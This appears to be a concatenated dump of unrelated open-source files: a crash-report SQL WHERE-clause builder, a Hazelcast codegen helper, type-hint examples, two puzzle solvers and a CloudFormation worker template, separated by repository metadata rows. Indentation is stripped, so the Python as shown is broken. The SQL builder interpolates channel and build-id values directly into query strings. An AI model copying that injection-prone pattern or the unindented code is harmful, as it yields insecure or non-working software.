sql_params = add_param_to_dict(sql_params, "os", params["os"])
## Adding versions to where clause
if params["versions"]:
versions_where = []
version_index = 0
# For each version, get information about it
for i in range(0, len(params["versions"]), 2):
versions_info = params["versions_info"]
product = params["versions"][i]
version = params["versions"][i + 1]
key = "%s:%s" % (product, version)
version_data = None
if key in versions_info:
version_data = versions_info[key]
if version_data and version_data["is_rapid_beta"]:
# If the version is a rapid beta, that means it's an
# alias for a list of other versions. We thus don't filter
# on that version, but on all versions listed in the
# version_data that we have.
# Get all versions that are linked to this rapid beta.
rapid_beta_versions = [
x for x in versions_info
if versions_info[x]["from_beta_version"] == key
and not versions_info[x]["is_rapid_beta"]
]
for rapid_beta in rapid_beta_versions:
versions_where.append(
PostgreSQLBase.build_version_where(
product,
versions_info[rapid_beta]["version_string"],
version_index,
sql_params,
versions_info[rapid_beta],
config
)
)
version_index += 2
else:
# This is a "normal" version, let's filter on it
versions_where.append(
PostgreSQLBase.build_version_where(
product,
version,
version_index,
sql_params,
version_data,
config
)
)
version_index += 2
if versions_where:
sql_where.append("(%s)" % " OR ".join(versions_where))
## Adding build id to where clause
if params["build_ids"]:
build_ids_list = ["r.build=%(build" + str(x) + ")s"
for x in range(len(params["build_ids"]))]
sql_where.append("(%s)" % (" OR ".join(build_ids_list)))
sql_params = add_param_to_dict(sql_params, "build",
params["build_ids"])
## Adding reason to where clause
if params["reasons"]:
reasons_list = ["r.reason=%(reason" + str(x) + ")s"
for x in range(len(params["reasons"]))]
sql_where.append("(%s)" % (" OR ".join(reasons_list)))
sql_params = add_param_to_dict(sql_params, "reason",
params["reasons"])
## Adding release channels to where clause
if params["release_channels"]:
channels_list = [
"UPPER(r.release_channel)=UPPER(%%(release_channel%s)s)" % x
for x in range(len(params["release_channels"]))
]
sql_where.append("(%s)" % " OR ".join(channels_list))
sql_params = add_param_to_dict(
sql_params,
"release_channel",
params["release_channels"]
)
## Adding report type to where clause
if params["report_type"] == "crash":
sql_where.append("r.hangid IS NULL")
elif params["report_type"] == "hang":
sql_where.append("r.hangid IS NOT NULL")
## Searching through plugins
if params["report_process"] == "plugin":
sql_where.append("r.process_type = 'plugin'")
sql_where.append(("plugins_reports.date_processed BETWEEN "
"%(from_date)s AND %(to_date)s"))
if params["plugin_terms"]:
comp = "="
if params["plugin_search_mode"] in ("contains", "starts_with"):
comp = " LIKE "
sql_where_plugin_in = []
for f in params["plugin_in"]:
if f == "name":
field = "plugins.name"
elif f == "filename":
field = "plugins.filename"
sql_where_plugin_in.append(comp.join((field,
"%(plugin_term)s")))
sql_params["plugin_term"] = params["plugin_terms"]
sql_where.append("(%s)" % " OR ".join(sql_where_plugin_in))
elif params["report_process"] == "browser":
sql_where.append("r.process_type IS NULL")
elif params["report_process"] == "content":
sql_where.append("r.process_type = 'content'")
sql_where = " AND ".join(sql_where)
return (sql_where, sql_params)
@staticmethod
def build_reports_sql_limit(params, sql_params):
"""
"""
sql_limit = """
LIMIT %(limit)s
OFFSET %(offset)s
"""
sql_params["limit"] = params["result_number"]
sql_params["offset"] = params["result_offset"]
return (sql_limit, sql_params)
@staticmethod
def build_version_where(
product,
version,
version_index,
sql_params,
version_data,
config
):
"""Return the content of WHERE of a SQL query for a given version. """
version_where = []
product_param = "version%s" % version_index
version_param = "version%s" % (version_index + 1)
sql_params[product_param] = product
sql_params[version_param] = version
if version_data and version_data["release_channel"]:
# If we have data about that version, and it has a release channel,
# we will want to add some more specific filters to the SQL query.
channel = version_data["release_channel"].lower()
if channel.startswith(tuple(config.non_release_channels)):
# This is a non-release channel.
# Use major_version instead of full version.
sql_params[version_param] = version_data["major_version"]
# Restrict by release_channel.
version_where.append("r.release_channel ILIKE '%s'" % channel)
if (
channel.startswith(tuple(config.restricted_channels)) and
version_data["build_id"]
):
# Restrict to a list of build_id.
builds = ", ".join(
"'%s'" % b for b in version_data["build_id"]
)
version_where.append("r.build IN (%s)" % builds)
else:
# It's a release.
version_where.append((
"r.release_channel NOT IN %s" %
(tuple(config.non_release_channels),)
))
version_where.append("r.product=%%(version%s)s" % version_index)
version_where.append("r.version=%%(version%s)s" % (version_index + 1))
return "(%s)" % " AND ".join(version_where)
| mpl-2.0 | 5,074,017,094,719,367,000 | 36.259346 | 79 | 0.519408 | false |
mmedenjak/hazelcast-client-protocol | py/__init__.py | 1 | 10457 | import keyword
import re
def py_types_encode_decode(t):
if t not in _py_types:
raise NotImplementedError("Missing type Mapping")
_pattern1 = re.compile("(.)([A-Z][a-z]+)")
_pattern2 = re.compile("([a-z0-9])([A-Z])")
def py_param_name(type_name):
type_name = _pattern1.sub(r"\1_\2", type_name)
type_name = _pattern2.sub(r"\1_\2", type_name).lower()
if keyword.iskeyword(type_name):
return "_%s" % type_name
return type_name
def py_get_import_path_holders(param_type):
return import_paths.get(param_type, [])
py_ignore_service_list = {
"Cache",
"CardinalityEstimator",
"Client.addPartitionLostListener",
"Client.authenticationCustom",
"Client.createProxies",
"Client.removeMigrationListener",
"Client.removePartitionLostListener",
"Client.triggerPartitionAssignment",
"ContinuousQuery",
"CPSubsystem",
"DurableExecutor",
"DynamicConfig",
"ExecutorService.cancelOnMember",
"ExecutorService.cancelOnPartition",
"Map.addPartitionLostListener",
"Map.aggregate",
"Map.aggregateWithPredicate",
"Map.eventJournalRead",
"Map.eventJournalSubscribe",
"Map.project",
"Map.projectWithPredicate",
"Map.removeAll",
"Map.removeInterceptor",
"Map.removePartitionLostListener",
"Map.submitToKey",
"MultiMap.delete",
"MC",
"Queue.drainTo",
"ReplicatedMap.addNearCacheEntryListener",
"ScheduledExecutor",
"Sql",
"Topic.publishAll",
"TransactionalMap.containsValue",
"XATransaction",
}
class ImportPathHolder:
def __init__(self, name, path):
self.name = name
self.path = path
def get_import_statement(self):
return "from hazelcast.%s import %s" % (self.path, self.name)
class PathHolders:
DataCodec = ImportPathHolder("DataCodec", "protocol.builtin")
ByteArrayCodec = ImportPathHolder("ByteArrayCodec", "protocol.builtin")
LongArrayCodec = ImportPathHolder("LongArrayCodec", "protocol.builtin")
Address = ImportPathHolder("Address", "core")
AddressCodec = ImportPathHolder("AddressCodec", "protocol.codec.custom.address_codec")
ErrorHolder = ImportPathHolder("ErrorHolder", "protocol")
ErrorHolderCodec = ImportPathHolder("ErrorHolderCodec", "protocol.codec.custom.error_holder_codec")
StackTraceElement = ImportPathHolder("StackTraceElement", "protocol")
StackTraceElementCodec = ImportPathHolder("StackTraceElementCodec",
"protocol.codec.custom.stack_trace_element_codec")
SimpleEntryView = ImportPathHolder("SimpleEntryView", "core")
SimpleEntryViewCodec = ImportPathHolder("SimpleEntryViewCodec", "protocol.codec.custom.simple_entry_view_codec")
DistributedObjectInfo = ImportPathHolder("DistributedObjectInfo", "core")
DistributedObjectInfoCodec = ImportPathHolder("DistributedObjectInfoCodec",
"protocol.codec.custom.distributed_object_info_codec")
MemberInfo = ImportPathHolder("MemberInfo", "core")
MemberInfoCodec = ImportPathHolder("MemberInfoCodec", "protocol.codec.custom.member_info_codec")
MemberVersion = ImportPathHolder("MemberVersion", "core")
MemberVersionCodec = ImportPathHolder("MemberVersionCodec", "protocol.codec.custom.member_version_codec")
StringCodec = ImportPathHolder("StringCodec", "protocol.builtin", )
ListLongCodec = ImportPathHolder("ListLongCodec", "protocol.builtin")
ListIntegerCodec = ImportPathHolder("ListIntegerCodec", "protocol.builtin")
ListUUIDCodec = ImportPathHolder("ListUUIDCodec", "protocol.builtin")
ListDataCodec = ImportPathHolder("ListDataCodec", "protocol.builtin")
ListMultiFrameCodec = ImportPathHolder("ListMultiFrameCodec", "protocol.builtin")
EntryListCodec = ImportPathHolder("EntryListCodec", "protocol.builtin")
EntryListLongByteArrayCodec = ImportPathHolder("EntryListLongByteArrayCodec", "protocol.builtin")
EntryListIntegerUUIDCodec = ImportPathHolder("EntryListIntegerUUIDCodec", "protocol.builtin")
EntryListIntegerLongCodec = ImportPathHolder("EntryListIntegerLongCodec", "protocol.builtin")
EntryListIntegerIntegerCodec = ImportPathHolder("EntryListIntegerIntegerCodec", "protocol.builtin")
EntryListUUIDLongCodec = ImportPathHolder("EntryListUUIDLongCodec", "protocol.builtin")
EntryListUUIDUUIDCodec = ImportPathHolder("EntryListUUIDUUIDCodec", "protocol.builtin")
EntryListUUIDListIntegerCodec = ImportPathHolder("EntryListUUIDListIntegerCodec", "protocol.builtin")
MapCodec = ImportPathHolder("MapCodec", "protocol.builtin")
CodecUtil = ImportPathHolder("CodecUtil", "protocol.builtin")
IndexConfig = ImportPathHolder("IndexConfig", "config")
IndexConfigCodec = ImportPathHolder("IndexConfigCodec", "protocol.codec.custom.index_config_codec")
BitmapIndexOptions = ImportPathHolder("BitmapIndexOptions", "config")
BitmapIndexOptionsCodec = ImportPathHolder("BitmapIndexOptionsCodec",
"protocol.codec.custom.bitmap_index_options_codec")
PagingPredicateHolder = ImportPathHolder("PagingPredicateHolder", "protocol")
PagingPredicateHolderCodec = ImportPathHolder("PagingPredicateHolderCodec",
"protocol.codec.custom.paging_predicate_holder_codec")
AnchorDataListHolder = ImportPathHolder("AnchorDataListHolder", "protocol")
AnchorDataListHolderCodec = ImportPathHolder("AnchorDataListHolderCodec",
"protocol.codec.custom.anchor_data_list_holder_codec")
EndpointQualifier = ImportPathHolder("EndpointQualifier", "protocol")
EndpointQualifierCodec = ImportPathHolder("EndpointQualifierCodec",
"protocol.codec.custom.endpoint_qualifier_codec")
RaftGroupId = ImportPathHolder("RaftGroupId", "protocol")
RaftGroupIdCodec = ImportPathHolder("RaftGroupIdCodec", "protocol.codec.custom.raft_group_id_codec")
import_paths = {
"CodecUtil": PathHolders.CodecUtil,
"longArray": [PathHolders.LongArrayCodec],
"byteArray": [PathHolders.ByteArrayCodec],
"String": [PathHolders.StringCodec],
"Data": [PathHolders.DataCodec],
"Address": [PathHolders.Address, PathHolders.AddressCodec],
"ErrorHolder": [PathHolders.ErrorHolder, PathHolders.ErrorHolderCodec],
"StackTraceElement": [PathHolders.StackTraceElement, PathHolders.StackTraceElementCodec],
"SimpleEntryView": [PathHolders.SimpleEntryView, PathHolders.SimpleEntryViewCodec],
"DistributedObjectInfo": [PathHolders.DistributedObjectInfo, PathHolders.DistributedObjectInfoCodec],
"MemberInfo": [PathHolders.MemberInfo, PathHolders.MemberInfoCodec],
"MemberVersion": [PathHolders.MemberVersion, PathHolders.MemberVersionCodec],
"RaftGroupId": [PathHolders.RaftGroupId, PathHolders.RaftGroupIdCodec],
"List_Long": [PathHolders.ListLongCodec],
"List_Integer": [PathHolders.ListIntegerCodec],
"List_UUID": [PathHolders.ListUUIDCodec],
"List_String": [PathHolders.ListMultiFrameCodec, PathHolders.StringCodec],
"List_Data": [PathHolders.ListMultiFrameCodec, PathHolders.DataCodec],
"ListCN_Data": [PathHolders.ListMultiFrameCodec, PathHolders.DataCodec],
"List_MemberInfo": [PathHolders.ListMultiFrameCodec, PathHolders.MemberInfoCodec],
"List_DistributedObjectInfo": [PathHolders.ListMultiFrameCodec, PathHolders.DistributedObjectInfoCodec],
"List_StackTraceElement": [PathHolders.ListMultiFrameCodec, PathHolders.StackTraceElementCodec],
"EntryList_String_String": [PathHolders.EntryListCodec, PathHolders.StringCodec],
"EntryList_String_byteArray": [PathHolders.EntryListCodec, PathHolders.StringCodec, PathHolders.ByteArrayCodec],
"EntryList_Long_byteArray": [PathHolders.EntryListLongByteArrayCodec],
"EntryList_Integer_UUID": [PathHolders.EntryListIntegerUUIDCodec],
"EntryList_Integer_Long": [PathHolders.EntryListIntegerLongCodec],
"EntryList_Integer_Integer": [PathHolders.EntryListIntegerIntegerCodec],
"EntryList_UUID_Long": [PathHolders.EntryListUUIDLongCodec],
"EntryList_String_EntryList_Integer_Long": [PathHolders.EntryListCodec, PathHolders.StringCodec,
PathHolders.EntryListIntegerLongCodec],
"EntryList_UUID_UUID": [PathHolders.EntryListUUIDUUIDCodec],
"EntryList_UUID_List_Integer": [PathHolders.EntryListUUIDListIntegerCodec],
"EntryList_Data_Data": [PathHolders.EntryListCodec, PathHolders.DataCodec],
"EntryList_Data_List_Data": [PathHolders.EntryListCodec, PathHolders.DataCodec, PathHolders.ListDataCodec],
"Map_String_String": [PathHolders.MapCodec, PathHolders.StringCodec],
"IndexConfig": [PathHolders.IndexConfig, PathHolders.IndexConfigCodec],
"ListIndexConfig": [PathHolders.IndexConfigCodec, PathHolders.ListMultiFrameCodec],
"BitmapIndexOptions": [PathHolders.BitmapIndexOptions, PathHolders.BitmapIndexOptionsCodec],
"AnchorDataListHolder": [PathHolders.AnchorDataListHolder, PathHolders.AnchorDataListHolderCodec],
"PagingPredicateHolder": [PathHolders.PagingPredicateHolder, PathHolders.PagingPredicateHolderCodec],
"EndpointQualifier": [PathHolders.EndpointQualifier, PathHolders.EndpointQualifierCodec],
"Map_EndpointQualifier_Address": [PathHolders.MapCodec, PathHolders.EndpointQualifierCodec,
PathHolders.AddressCodec]
}
_py_types = {
"boolean",
"byte",
"int",
"long",
"UUID",
"byteArray",
"longArray",
"String",
"Data",
"Address",
"DistributedObjectInfo",
"SimpleEntryView",
"ErrorHolder",
"StackTraceElement",
"MemberInfo",
"MemberVersion",
"EndpointQualifier",
"RaftGroupId",
"AnchorDataListHolder",
"PagingPredicateHolder",
"IndexConfig",
"BitmapIndexOptions",
"List_Integer",
"List_Long",
"List_UUID",
"List_byteArray",
"List_Data",
"List_DistributedObjectInfo",
"List_MemberInfo",
"List_String",
"List_StackTraceElement",
"ListCN_Data",
"EntryList_UUID_Long",
"EntryList_String_String",
"EntryList_UUID_List_Integer",
"EntryList_Data_Data",
"Map_String_String",
"Map_EndpointQualifier_Address",
}
def py_escape_keyword(value):
if value in keyword.kwlist:
return "%s_" % value
else:
return value
| apache-2.0 | 2,040,683,131,968,967,400 | 44.864035 | 116 | 0.724969 | false |
chenpota/python | type-hints/example/01_builtin-type.py | 1 | 1067 | def pass_int(v: int) -> None:
pass
pass_int(3.4) # error
pass_int(5)
#######################################
def pass_float(v: float) -> None:
pass
pass_float(3.4)
pass_float(5)
#######################################
def pass_str(v: str) -> None:
pass
pass_str('text')
pass_str(3.4) # error
#######################################
def pass_bool(v: bool) -> None:
pass
pass_bool(3 == 3)
pass_bool(3) # error
#######################################
def pass_list(v: list) -> None:
pass
pass_list([])
pass_list([1, 's'])
pass_list(()) # error
#######################################
def pass_tuple(v: tuple) -> None:
pass
pass_tuple(())
pass_tuple((1, 's'))
pass_tuple([]) # error
#######################################
def get_int_v1() -> int:
return 1
def get_int_v2() -> int:
return 1.0 # error
#######################################
def get_float_v1() -> float:
return 1.0
def get_float_v2() -> float:
return 1
#######################################
def get_str() -> str:
return 'text'
| mit | -6,946,783,613,546,199,000 | 14.242857 | 39 | 0.395501 | false |
pirius/draught-board-puzzle-aka-checkerboard-puzzle-solver | python/source/checkerboardpuzzle_utils.py | 1 | 1570 | from numpy import array, rot90, fliplr, array_equal
from checkerboardpuzzle_stone import Rotation
def generate_rotated_nparrays(nparray):
"""generate rotated and mirrored versions of given nparray."""
r1 = rot90(nparray)
r2 = rot90(r1)
r3 = rot90(r2)
f1 = fliplr(nparray)
f2 = fliplr(r1)
f3 = fliplr(r2)
f4 = fliplr(r3)
all_rot = [nparray,r1,r2,r3,f1,f2,f3,f4]
return all_rot
def generate_rotations(fields):
"""generate all rotations of that stone."""
#r1 = rot90(fields)
#r2 = rot90(r1)
#r3 = rot90(r2)
#f1 = fliplr(fields)
#f2 = fliplr(r1)
#f3 = fliplr(r2)
#f4 = fliplr(r3)
#all_rot = [r1,r2,r3,f1,f2,f3,f4]
all_rot = generate_rotated_nparrays(fields)
# check if rotations are equal
rotations = [] # [Rotation(fields)]
for r_new in all_rot:
l = len(filter(lambda r_old:array_equal(r_old.nparray,r_new), rotations))
if l > 1:
raise Exception('Rotations doubled? That should be impossible!')
elif l == 0:
# not in rotations yet, add
rotations = rotations + [Rotation(r_new)]
return rotations
def unique_nparrays(nparrays):
"""return unique list of nparrays."""
unique = []
for a in nparrays:
for u in unique:
if (a == u).all():
break
else:
unique = unique + [a]
return unique
def append_to_file(filepath, text):
"""append text to given file."""
with open(filepath, 'a') as myfile:
myfile.write(text)
myfile.close() | lgpl-3.0 | 5,289,287,308,255,993,000 | 28.641509 | 81 | 0.593631 | false |
seeba8/str8tssolver | field.py | 1 | 6062 | from square import Square
from street import Street
class Field:
def __init__(self, test=None):
self.streets = set()
if test != None:
blacks = test["blacks"]
values = test["values"]
self.squares = [Square(i, blacks[i] == "1", "123456789" if values[i] == "0" else values[i]) for i in
range(81)]
self.collect_streets()
else:
self.squares = [Square(i) for i in range(81)]
def solve(self):
last_perf = 0
current_perf = 1
while (last_perf != current_perf):
last_perf = self.get_total_length()
self.eliminate_possibilities()
current_perf = self.get_total_length()
if self.is_solved():
return True
return False
def is_solved(self):
for s in self:
if not s.is_number() and not s.is_black:
return False
return True
def collect_streets(self):
for square in self:
if not square.is_black:
s = self.get_hstreet(square)
if s != None:
self.streets.add(s)
s = self.get_vstreet(square)
if s != None:
self.streets.add(s)
def __getitem__(self,i):
if isinstance(i,tuple):
x,y = i
if x < 0 or x >= 9 or y < 0 or y >= 9:
raise IndexError
i = y * 9 + x
try:
return self.squares[i]
except:
raise
def __iter__(self):
for s in self.squares:
yield s
def get_row(self, square, without_square=False):
for i in range(9):
s = self[i, square.y]
if not without_square or s != square:
yield s
def get_column(self, square, without_square=False):
for i in range(9):
s = self[square.x, i]
if not without_square or s != square:
yield s
def get_hstreet(self, square):
x = square.x
y = square.y
street = {square}
if x - 1 >= 0 and not self[x - 1, y].is_black:
return None
for i in range(1, 10):
try:
if not self[x + i, y].is_black:
street.add(self[x + i, y])
else:
return Street(street)
except IndexError:
return Street(street)
return Street(street)
def get_vstreet(self, square):
x = square.x
y = square.y
street = {square}
if y - 1 >= 0 and not self[x, y - 1].is_black:
return None
for i in range(1, 10):
try:
if not self[x, y + i].is_black:
street.add(self[x, y + i])
else:
return Street(street)
except:
return Street(street)
return Street(street)
def get_rest_without_street(self, street):
if street.is_horizontal:
y = street.y
for x in range(9):
if not self[x, y] in street:
yield self[x, y]
else:
x = street.x
for y in range(9):
if not self[x, y] in street:
yield self[x, y]
def remove_street_options_from_rest(self, street):
"""
e.g.: if len(street) == 2 and street_options = {1,2,3}, then
one value in the middle, {2}, can be removed
"""
street_options = street.get_options()
if len(street_options) < 9 and len(street_options) < len(street) * 2:
removables = ("".join(sorted(street_options))[len(street_options) -
len(street):len(street)])
for o in removables:
for s in self.get_rest_without_street(street):
s.remove_option(o)
def eliminate_possibilities(self):
for square in self:
if square.is_number():
self.eliminate_rowcol(square)
for street in self.streets:
street.eliminate_nonconsec()
self.remove_street_options_from_rest(street)
for square in street:
if square.is_number():
street.eliminate_out_of_range(square)
def eliminate_rowcol(self, square):
v = square.get_value()
for s in self.get_row(square,True):
s.remove_option(v)
for s in self.get_column(square,True):
s.remove_option(v)
def _construct_output(self, show_hints=False):
rowsep = "+-------" * 9 + "+\n"
rowstart = ["| "]*3
output = rowsep
sa = rowstart
for i in range(81):
s = self[i]
placeholder = "\u2588" if s.is_black else " "
if s.is_number():
sa = [sa[r] + placeholder + (s.get_value() if r == 1 else placeholder)
+ placeholder for r in range(3)]
else:
if show_hints and not s.is_black:
o = self[i].get_options()
options = "".join([str(r) if str(r) in o else placeholder for r in range(1, 10)])
sa = [sa[r] + options[3 * r:3 * (r + 1)] for r in range(3)]
else:
sa = [sa[r] + placeholder*3 for r in range(3)]
sa = [sa[r] + " | " for r in range(3)]
if (i+1) % 9 == 0:
output += "\n".join(sa) + "\n"
output += rowsep
sa = rowstart
return output[:-1]
def __str__(self):
return self._construct_output()
def show(self):
print(str(self))
return str(self)
def show_hints(self):
s = self._construct_output(True)
print(s)
return s
def get_total_length(self):
return len("".join(s.get_options() for s in self))
| gpl-3.0 | -2,845,258,074,390,722,000 | 31.945652 | 112 | 0.466678 | false |
lliss/model-my-watershed | deployment/cfn/worker.py | 1 | 15672 | from troposphere import (
Parameter,
Ref,
Output,
Tags,
GetAtt,
Base64,
Join,
Equals,
cloudwatch as cw,
ec2,
elasticloadbalancing as elb,
autoscaling as asg,
route53 as r53
)
from utils.cfn import get_recent_ami
from utils.constants import (
ALLOW_ALL_CIDR,
EC2_INSTANCE_TYPES,
GRAPHITE,
HTTP,
HTTPS,
POSTGRESQL,
REDIS,
RELP,
SSH,
STATSITE,
VPC_CIDR
)
from majorkirby import StackNode, MKUnresolvableInputError
class Worker(StackNode):
INPUTS = {
'Tags': ['global:Tags'],
'Region': ['global:Region'],
'StackType': ['global:StackType'],
'StackColor': ['global:StackColor'],
'KeyName': ['global:KeyName'],
'IPAccess': ['global:IPAccess'],
'AvailabilityZones': ['global:AvailabilityZones',
'VPC:AvailabilityZones'],
'RDSPassword': ['global:RDSPassword', 'DataPlane:RDSPassword'],
'WorkerInstanceType': ['global:WorkerInstanceType'],
'WorkerAMI': ['global:WorkerAMI'],
'WorkerInstanceProfile': ['global:WorkerInstanceProfile'],
'WorkerAutoScalingDesired': ['global:WorkerAutoScalingDesired'], # NOQA
'WorkerAutoScalingMin': ['global:WorkerAutoScalingMin'],
'WorkerAutoScalingMax': ['global:WorkerAutoScalingMax'],
'PublicSubnets': ['global:PublicSubnets', 'VPC:PublicSubnets'],
'PrivateSubnets': ['global:PrivateSubnets', 'VPC:PrivateSubnets'],
'PublicHostedZoneName': ['global:PublicHostedZoneName'],
'VpcId': ['global:VpcId', 'VPC:VpcId'],
'GlobalNotificationsARN': ['global:GlobalNotificationsARN'],
}
DEFAULTS = {
'Tags': {},
'Region': 'us-east-1',
'StackType': 'Staging',
'StackColor': 'Green',
'KeyName': 'mmw-stg',
'IPAccess': ALLOW_ALL_CIDR,
'WorkerInstanceType': 't2.micro',
'WorkerInstanceProfile': 'WorkerInstanceProfile',
'WorkerAutoScalingDesired': '1',
'WorkerAutoScalingMin': '1',
'WorkerAutoScalingMax': '1',
}
ATTRIBUTES = {
'StackType': 'StackType',
'StackColor': 'StackColor',
}
def set_up_stack(self):
super(Worker, self).set_up_stack()
tags = self.get_input('Tags').copy()
tags.update({'StackType': 'Worker'})
self.default_tags = tags
self.region = self.get_input('Region')
self.add_description('Worker stack for MMW')
# Parameters
self.color = self.add_parameter(Parameter(
'StackColor', Type='String',
Description='Stack color', AllowedValues=['Blue', 'Green']
), 'StackColor')
self.keyname = self.add_parameter(Parameter(
'KeyName', Type='String',
Description='Name of an existing EC2 key pair'
), 'KeyName')
self.ip_access = self.add_parameter(Parameter(
'IPAccess', Type='String', Default=self.get_input('IPAccess'),
Description='CIDR for allowing SSH access'
), 'IPAccess')
self.availability_zones = self.add_parameter(Parameter(
'AvailabilityZones', Type='CommaDelimitedList',
Description='Comma delimited list of availability zones'
), 'AvailabilityZones')
self.rds_password = self.add_parameter(Parameter(
'RDSPassword', Type='String', NoEcho=True,
Description='Database password',
), 'RDSPassword')
self.worker_instance_type = self.add_parameter(Parameter(
'WorkerInstanceType', Type='String', Default='t2.micro',
Description='Worker EC2 instance type',
AllowedValues=EC2_INSTANCE_TYPES,
ConstraintDescription='must be a valid EC2 instance type.'
), 'WorkerInstanceType')
self.worker_ami = self.add_parameter(Parameter(
'WorkerAMI', Type='String',
Default=self.get_recent_worker_ami(),
Description='Worker AMI'
), 'WorkerAMI')
self.worker_instance_profile = self.add_parameter(Parameter(
'WorkerInstanceProfile', Type='String',
Default='WorkerInstanceProfile',
Description='Worker instance profile'
), 'WorkerInstanceProfile')
self.worker_auto_scaling_desired = self.add_parameter(Parameter(
'WorkerAutoScalingDesired', Type='String', Default='1',
Description='Worker AutoScalingGroup desired'
), 'WorkerAutoScalingDesired')
self.worker_auto_scaling_min = self.add_parameter(Parameter(
'WorkerAutoScalingMin', Type='String', Default='1',
Description='Worker AutoScalingGroup minimum'
), 'WorkerAutoScalingMin')
self.worker_auto_scaling_max = self.add_parameter(Parameter(
'WorkerAutoScalingMax', Type='String', Default='1',
Description='Worker AutoScalingGroup maximum'
), 'WorkerAutoScalingMax')
self.public_subnets = self.add_parameter(Parameter(
'PublicSubnets', Type='CommaDelimitedList',
Description='A list of public subnets'
), 'PublicSubnets')
self.private_subnets = self.add_parameter(Parameter(
'PrivateSubnets', Type='CommaDelimitedList',
Description='A list of private subnets'
), 'PrivateSubnets')
self.public_hosted_zone_name = self.add_parameter(Parameter(
'PublicHostedZoneName', Type='String',
Description='Route 53 public hosted zone name'
), 'PublicHostedZoneName')
self.vpc_id = self.add_parameter(Parameter(
'VpcId', Type='String',
Description='VPC ID'
), 'VpcId')
self.notification_topic_arn = self.add_parameter(Parameter(
'GlobalNotificationsARN', Type='String',
Description='ARN for an SNS topic to broadcast notifications'
), 'GlobalNotificationsARN')
worker_lb_security_group, \
worker_security_group = self.create_security_groups()
worker_lb = self.create_load_balancer(worker_lb_security_group)
worker_auto_scaling_group = self.create_auto_scaling_resources(
worker_security_group,
worker_lb)
self.create_cloud_watch_resources(worker_auto_scaling_group)
self.create_dns_records(worker_lb)
self.add_output(Output('WorkerLoadBalancerEndpoint',
Value=GetAtt(worker_lb, 'DNSName')))
self.add_output(Output('WorkerLoadBalancerHostedZoneNameID',
Value=GetAtt(worker_lb,
'CanonicalHostedZoneNameID')))
def get_recent_worker_ami(self):
try:
worker_ami_id = self.get_input('WorkerAMI')
except MKUnresolvableInputError:
worker_ami_id = get_recent_ami(self.aws_profile,
'mmw-worker-*')
return worker_ami_id
def create_security_groups(self):
worker_lb_security_group_name = 'sgWorkerLoadBalancer'
worker_lb_security_group = self.add_resource(ec2.SecurityGroup(
worker_lb_security_group_name,
GroupDescription='Enables access to workers via a load balancer',
VpcId=Ref(self.vpc_id),
SecurityGroupIngress=[
ec2.SecurityGroupRule(
IpProtocol='tcp', CidrIp=Ref(self.ip_access), FromPort=p,
ToPort=p
)
for p in [HTTP]
],
SecurityGroupEgress=[
ec2.SecurityGroupRule(
IpProtocol='tcp', CidrIp=VPC_CIDR, FromPort=p, ToPort=p
)
for p in [HTTP]
],
Tags=self.get_tags(Name=worker_lb_security_group_name)
))
worker_security_group_name = 'sgWorker'
worker_security_group = self.add_resource(ec2.SecurityGroup(
worker_security_group_name,
GroupDescription='Enables access to workers',
VpcId=Ref(self.vpc_id),
SecurityGroupIngress=[
ec2.SecurityGroupRule(
IpProtocol='tcp', CidrIp=VPC_CIDR, FromPort=p, ToPort=p
)
for p in [SSH, HTTP]
] + [
ec2.SecurityGroupRule(
IpProtocol='tcp', SourceSecurityGroupId=Ref(sg),
FromPort=HTTP, ToPort=HTTP
)
for sg in [worker_lb_security_group]
],
SecurityGroupEgress=[
ec2.SecurityGroupRule(
IpProtocol='tcp', CidrIp=VPC_CIDR, FromPort=p, ToPort=p
)
for p in [GRAPHITE, POSTGRESQL, REDIS, STATSITE, RELP]
] + [
ec2.SecurityGroupRule(
IpProtocol='udp', CidrIp=VPC_CIDR, FromPort=p, ToPort=p
)
for p in [STATSITE]
] + [
ec2.SecurityGroupRule(
IpProtocol='tcp', CidrIp=ALLOW_ALL_CIDR, FromPort=p,
ToPort=p
)
for p in [HTTP, HTTPS]
],
Tags=self.get_tags(Name=worker_security_group_name)
))
return worker_lb_security_group, worker_security_group
def create_load_balancer(self, worker_lb_security_group):
worker_lb_name = 'elbWorker'
return self.add_resource(elb.LoadBalancer(
worker_lb_name,
ConnectionDrainingPolicy=elb.ConnectionDrainingPolicy(
Enabled=True,
Timeout=300,
),
CrossZone=True,
SecurityGroups=[Ref(worker_lb_security_group)],
Listeners=[
elb.Listener(
LoadBalancerPort='80',
InstancePort='80',
Protocol='HTTP',
)
],
HealthCheck=elb.HealthCheck(
Target='HTTP:80/',
HealthyThreshold='3',
UnhealthyThreshold='2',
Interval='60',
Timeout='10',
),
Subnets=Ref(self.public_subnets),
Tags=self.get_tags(Name=worker_lb_name)
))
def create_auto_scaling_resources(self, worker_security_group, worker_lb):
worker_launch_config_name = 'lcWorker'
worker_launch_config = self.add_resource(
asg.LaunchConfiguration(
worker_launch_config_name,
ImageId=Ref(self.worker_ami),
IamInstanceProfile=Ref(self.worker_instance_profile),
InstanceType=Ref(self.worker_instance_type),
KeyName=Ref(self.keyname),
SecurityGroups=[Ref(worker_security_group)],
UserData=Base64(
Join('', self.get_cloud_config()))
))
worker_auto_scaling_group_name = 'asgWorker'
return self.add_resource(
asg.AutoScalingGroup(
worker_auto_scaling_group_name,
AvailabilityZones=Ref(self.availability_zones),
Cooldown=300,
DesiredCapacity=Ref(self.worker_auto_scaling_desired),
HealthCheckGracePeriod=600,
HealthCheckType='ELB',
LaunchConfigurationName=Ref(worker_launch_config),
LoadBalancerNames=[Ref(worker_lb)],
MaxSize=Ref(self.worker_auto_scaling_max),
MinSize=Ref(self.worker_auto_scaling_min),
NotificationConfigurations=[
asg.NotificationConfigurations(
TopicARN=Ref(self.notification_topic_arn),
NotificationTypes=[
asg.EC2_INSTANCE_LAUNCH,
asg.EC2_INSTANCE_LAUNCH_ERROR,
asg.EC2_INSTANCE_TERMINATE,
asg.EC2_INSTANCE_TERMINATE_ERROR
]
)
],
VPCZoneIdentifier=Ref(self.private_subnets),
Tags=[asg.Tag('Name', 'Worker', True)]
)
)
def get_cloud_config(self):
return ['#cloud-config\n',
'\n',
'mounts:\n',
' - [xvdf, /opt/rwd-data, ext4, "defaults,nofail,discard", 0, 2]\n'
'\n',
'write_files:\n',
' - path: /etc/mmw.d/env/MMW_STACK_COLOR\n',
' permissions: 0750\n',
' owner: root:mmw\n',
' content: ', Ref(self.color), '\n',
' - path: /etc/mmw.d/env/MMW_DB_PASSWORD\n',
' permissions: 0750\n',
' owner: root:mmw\n',
' content: ', Ref(self.rds_password)]
def create_cloud_watch_resources(self, worker_auto_scaling_group):
self.add_resource(cw.Alarm(
